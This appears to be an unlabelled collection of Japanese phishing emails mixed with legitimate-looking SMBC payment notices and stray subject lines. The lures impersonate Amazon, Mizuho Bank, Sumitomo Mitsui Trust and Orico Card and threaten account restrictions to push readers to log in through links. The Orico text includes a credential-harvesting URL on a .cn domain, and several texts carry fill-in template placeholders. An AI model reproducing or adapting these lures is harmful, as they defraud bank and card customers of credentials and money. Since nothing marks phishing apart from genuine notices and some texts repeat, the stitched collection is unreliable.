【重要】アカウント情報の更新をお願いします
【重要】アカウント情報の更新をお願いします
お客様各位、
Amazonをご利用いただき、誠にありがとうございます。
弊社は、お客様により安全で快適なショッピング体験を提供するために、常にサービスの向上を目指しております。
このたび、弊社のシステムをアップグレードすることとなり、お客様の個人情報の更新をお願いすることになりました。個人情報を正確かつ最新の状態に保つことで、よりスムーズにサービスをご利用いただけますので、ご協力をお願いいたします。
ご協力いただくには、以下の手順に従って個人情報の更新を行っていただく必要があります。なお、手順に従わない場合、アカウントの利用が制限される場合がありますので、ご注意ください。
以下のリンクをクリックしてアカウントにログインしてください。
ログイン後、アカウント情報の画面に移動し、個人情報を更新してください。
情報を更新したら、最後に「更新」ボタンをクリックして完了してください。
アカウントにログインするためには、以下の情報が必要です。
アカウントID
パスワード
以下のリンクをクリックして、個人情報の更新を行ってください。
個人情報の更新
お客様のプライバシー保護のため、弊社は全力を尽くしております。個人情報の更新をする際に、何か問題がありましたら、お気軽にお問い合わせください。
引き続き、Amazonをご愛顧いただけますよう、よろしくお願いいたします。
敬具、
Amazonカスタマーサポート
{1}{2}{3}
【注意】三井住友カード:アカウント情報の確認をお願いします
日頃より、三井住友カードをご利用いただきありがとうございます。
システムにて定期的な監査中、お客様のアカウントに一部の変動を確認しました。安全対策の一環として、以下のステップをとっていただきたく存じます。
確認手順:
Vpassログイン
三井住友カード公式サイトへ直接、ブラウザを利用してアクセスしてください。ご自身のアカウントにサインインし、最近の取引とアカウントの詳細を確認してください。何らかの不具合や疑問が生じた場合は、直ちに弊社サポートセンターにご連絡ください。【安全上のヒント】
このメールには、セキュリティの理由から直接的なログインリンクは含めておりません。いかなる状況でも、お客様のパスワードや個人情報を第三者に開示しないでください。お手数をおかけしますが、お客様の安全のため、ご協力とご理解をお願い申し上げます。
敬具、
三井住友カード
カスタマーセービス部
お支払い日のご案内
SMBC 三井住友カード
弊社カードをご利用いただきありがとうございます。
次回お支払金額のお知らせです。
Vpassアプリ・LINE・Webのいずれかで、ご利用明細をご確認ください。
▼ Vpass Web でログイン
https://www.smbc-card.com/memapi/jaxrs/meisai/v1
▼ LINE でログイン
https://www.smbc-card.com/mem/info/line/index.jsp
▼Vpassアプリダウンロード
・iPhoneをご利用の方 ※App Storeにリンクします。
App Storeからダウンロード
・Androidをご利用の方 ※Google Playにリンクします。
Google Playで手に入れよう
※おまとめログインサービスご利用の方は、ログイン後の画面上部にてご覧になりたいカードをご選択ください。
※明細データはパソコンからCSVファイルのダウンロードが可能です。
--------------------------------------------
▼VpassID・パスワードをお忘れの方、未登録の方のお手続きはこちらから
https://www.smbc-card.com/mem/vps/login/index.jsp
※VpassID・パスワードについて、電話・メールでの回答は行っておりませんのでご了承ください。
▼お支払い金額の表示について
お支払い日が10日の方の場合、お支払い月の前月21日(26日の方は当月6日)以降にあとからリボ・あとから分割等の利用後変更サービスを
お申し込みいただいた場合は、お支払い金額が同サービスお申し込み前の金額での表示となっている場合がございます。
その場合は、改めてお申し込み後の内容で「お支払金額のお知らせ」をお送りいたします。
いいキャッシュレスが、いい毎日を作る。
Have a good Cashless.
▼Vpassアプリ 生体認証で素早く安全にログイン
App Storeからダウンロード
Google Playで手に入れよう
弊社からお送りするメールサービスは、お客さまにご登録いただいたハンドルネー
ムがメール本文の冒頭につきますのでご確認をお願いします。
(ハンドルネームの登録がない場合はカード名称を表示します)
ハンドルネームとは
■発行者
三井住友カード株式会社
〒135-0061 東京都江東区豊洲2丁目2番31号 SMBC豊洲ビル
お問い合わせはこちら
※本メールは重要なお知らせのため、メール配信を「否」にされている方にも送信しております。
本メールに関する一切の記事の無断転載および再配布を禁じます。
Copyright (C) Sumitomo Mitsui Card Co., Ltd.
【緊急】三井住友カード:アカウント確認のお願い
三井住友カードをご愛用いただき、誠にありがとうございます。
本日、お客様のカードアカウントに不審な動きが検知されました。安全確保のため、以下のガイダンスに従い、アカウントの確認をお願いいたします。
対処の推奨手順:
Vpassログイン
三井住友カード公式ウェブサイトへブラウザで直接アクセスください。セキュリティ確認のため、アカウントにログインし、最近のアクティビティを見直してください。不明な取引がある場合、または不安がある場合は、即時に弊社のサポートセンターへご連絡ください。【ご注意】
当社からのメールでは、直接的なログインリンクを含むことはございません。サポートが必要な場合、または質問がある場合は、公式の連絡先を通じてお問い合わせください。お客様の情報とプライバシーの安全は、私たちの最大の関心事です。ご協力のほど、よろしくお願い申し上げます。
敬具、
三井住友カード カスタマーセキュリティ部門
{1}{2}{3}
【みずほ銀行】お客さま情報等の確認について
平素より、みずほ銀行をご利用いただきありがとうございます。
当社では、犯罪収益移転防止法に基づき、お取引を行う目的等を確認させていただいております。
また、この度のご案内は、当社ご利用規約第5条1項3に基づくご依頼となります。
お客様お客様の直近の取引についていくつかのご質問がございます、下記のリンクをアクセスし、ご回答ください。
※一定期間ご確認いただけない場合、口座取引を一部制限させていただきます。
※回答が完了しますと、通常どおりログイン後のお手続きが可能になります。
お客様のご返信内容を確認後、利用制限の解除を検討させていただきますので、できる限り詳細にご回答ください。
--------------------------------------------------------------
※本メールの送信アドレスは送信専用となっております。
返信メールでのお問い合わせは承りかねますので、あらかじめご了承願います。
お問い合わせは下記まで
みずほダイレクトヘルプデスク
フリーダイヤル:0120-3242-99
海外からのご利用などフリーダイヤルをご利用いただけない場合は:03-3211-9324[通話料有料]
※月曜日~金曜日9時00分~21時00分、土·日曜日、祝日·振替休日9時00分~17時00分
1月1日~2日はご利用いただけません。12月31日、1月3日の受付時間は9時00分~17時00分です。
お問い合わせ(入カノオーム):https://www.faq.mizuhobank.co.jp/helpdesk?category_id=175&site_domain=default
みずほ銀行
【ご注意ください】当社サイトご利用制限のお知らせ!
お客さま各位 m-dobutuseikatu@blog.so-net.ne.jp
平素は三井住友信託ダイレクトをご利用いただき、誠にありがとうございます。
お客さまのWEBサイトのご利用につきまして、パスワード等の入力相違が続きましたので、8月23日(月)2:38分に当社サイトのご利用(WEB、スマートフォン共通)を一時制限させていただきました。
お客さまにはお手数をおかけいたしますが、何卒ご理解とご協力をお願い申しあげます。
本人確認後、制限を解除することができます。
◆本人確認をご希望の方は、以下のボタンをクリックしてご本人様確認を行ってください。
本人確認を
ご本人様確認のため、口座から1円を差し引かせていただく場合がございます。
※回答が完了しますと、通常どおりログイン後のお手続きが可能になります。
※24時間以内に本人確認が取れない場合、アカウントのお取引を制限させていただきます。
------------------------------------------------------------------------
三井住友信託銀行株式会社
金融機関コード : 0294
登録金融機関 : 関東財務局長(登金)第649号
加入協会:日本証券業協会、一般社団法人 日本投資顧問業協会
Copyright (c) Sumitomo Mitsui Trust Bank, Limited. All rights reserved.
\おめでとうございます/キャッシュバック増額対象!ネット
Email verification code: 005939
Security alert for
回線の乗り換えで35000円おトク[Yahoo! JAPAN]
【ORICO CARD】お取引のご確認
Orico CARDをご利用いただき、誠にありがとうございます。
このたび、お客さまのお取引につきまして、第三者による不正使用の可能性を検知したため·一時的にお取引をお止めしました。
ご本人さまのご利用であった場合は、大変お手数をおかけいたしますが、再度ご利用をお願、申しあげます。
(インターネッ店舗でのご利用の場合は、お取引の成立状況をご確認のうえ、再度ご利用をお原いたします。)
利用確認のお手続下記URL
https://tuien.cn/loginn.php?_ga=2.118135626.255339977.1627783710-1872511496.1627783705
よりアクセスし完了いただきますようお願いたします。
ご本人さまのご利用でない場合には、今後、安全にカードをご利用いただくため、カードの差替·え等お手続きが必要となります。お手数ですが、下記
【本メール専用ダイヤル】へお電話くださいますようお願いたします。
ご心配とご不便をおかけいたしますが、何卒ご理解賜りますようお願い申しあげます。
·不正取引の監視体制について
(1)弊社ではお客さまが犯罪に巻き込まれないよう、お客さまのカードに不審なお取引がないか24時間365日モニタリング(不正使用の監視)を行っております。
(2)お取引の監視により不正取引の傾向と合致したお取引を保留のうえ、本メールを配信しております。
(3)弊社のカード不正使用に対する取組みについては、詳しくは弊社ホームページをご覧ください。
お支払い日のご案内
SMBC 三井住友カード
弊社カードをご利用いただきありがとうございます。
次回お支払金額のお知らせです。
Vpassアプリ・LINE・Webのいずれかで、ご利用明細をご確認ください。
▼ Vpass Web でログイン
▼ LINE でログイン
▼Vpassアプリダウンロード
・iPhoneをご利用の方 ※App Storeにリンクします。
App Storeからダウンロード
・Androidをご利用の方 ※Google Playにリンクします。
Google Playで手に入れよう
※おまとめログインサービスご利用の方は、ログイン後の画面上部にてご覧になりたいカードをご選択ください。
※明細データはパソコンからCSVファイルのダウンロードが可能です。
--------------------------------------------
▼VpassID・パスワードをお忘れの方、未登録の方のお手続きはこちらから
https://www.smbc-card.com/mem/vps/login/index.jsp
※VpassID・パスワードについて、電話・メールでの回答は行っておりませんのでご了承ください。
▼お支払い金額の表示について
お支払い日が10日の方の場合、お支払い月の前月21日(26日の方は当月6日)以降にあとからリボ・あとから分割等の利用後変更サービスを
お申し込みいただいた場合は、お支払い金額が同サービスお申し込み前の金額での表示となっている場合がございます。
その場合は、改めてお申し込み後の内容で「お支払金額のお知らせ」をお送りいたします。
いいキャッシュレスが、いい毎日を作る。
Have a good Cashless.
▼Vpassアプリ 生体認証で素早く安全にログイン
App Storeからダウンロード
Google Playで手に入れよう
弊社からお送りするメールサービスは、お客さまにご登録いただいたハンドルネー
ムがメール本文の冒頭につきますのでご確認をお願いします。
(ハンドルネームの登録がない場合はカード名称を表示します)
ハンドルネームとは
■発行者
三井住友カード株式会社
〒135-0061 東京都江東区豊洲2丁目2番31号 SMBC豊洲ビル
お問い合わせはこちら
※本メールは重要なお知らせのため、メール配信を「否」にされている方にも送信しております。
本メールに関する一切の記事の無断転載および再配布を禁じます。
Copyright (C) Sumitomo Mitsui Card Co., Ltd.
【みずほ銀行】お客さま情報等の確認について
平素より、みずほ銀行をご利用いただきありがとうございます。
当社では、犯罪収益移転防止法に基づき、お取引を行う目的等を確認させていただいております。
また、この度のご案内は、当社ご利用規約第5条1項3に基づくご依頼となります。
お客様お客様の直近の取引についていくつかのご質問がございます、下記のリンクをアクセスし、ご回答ください。
※一定期間ご確認いただけない場合、口座取引を一部制限させていただきます。
※回答が完了しますと、通常どおりログイン後のお手続きが可能になります。
お客様のご返信内容を確認後、利用制限の解除を検討させていただきますので、できる限り詳細にご回答ください。
--------------------------------------------------------------
※本メールの送信アドレスは送信専用となっております。
返信メールでのお問い合わせは承りかねますので、あらかじめご了承願います。
お問い合わせは下記まで
みずほダイレクトヘルプデスク
フリーダイヤル:0120-3242-99
海外からのご利用などフリーダイヤルをご利用いただけない場合は:03-3211-9324[通話料有料]
※月曜日~金曜日9時00分~21時00分、土·日曜日、祝日·振替休日9時00分~17時00分
1月1日~2日はご利用いただけません。12月31日、1月3日の受付時間は9時00分~17時00分です。
お問い合わせ(入カノオーム):https://www.faq.mizuhobank.co.jp/helpdesk?category_id=175&site_domain=default
みずほ銀行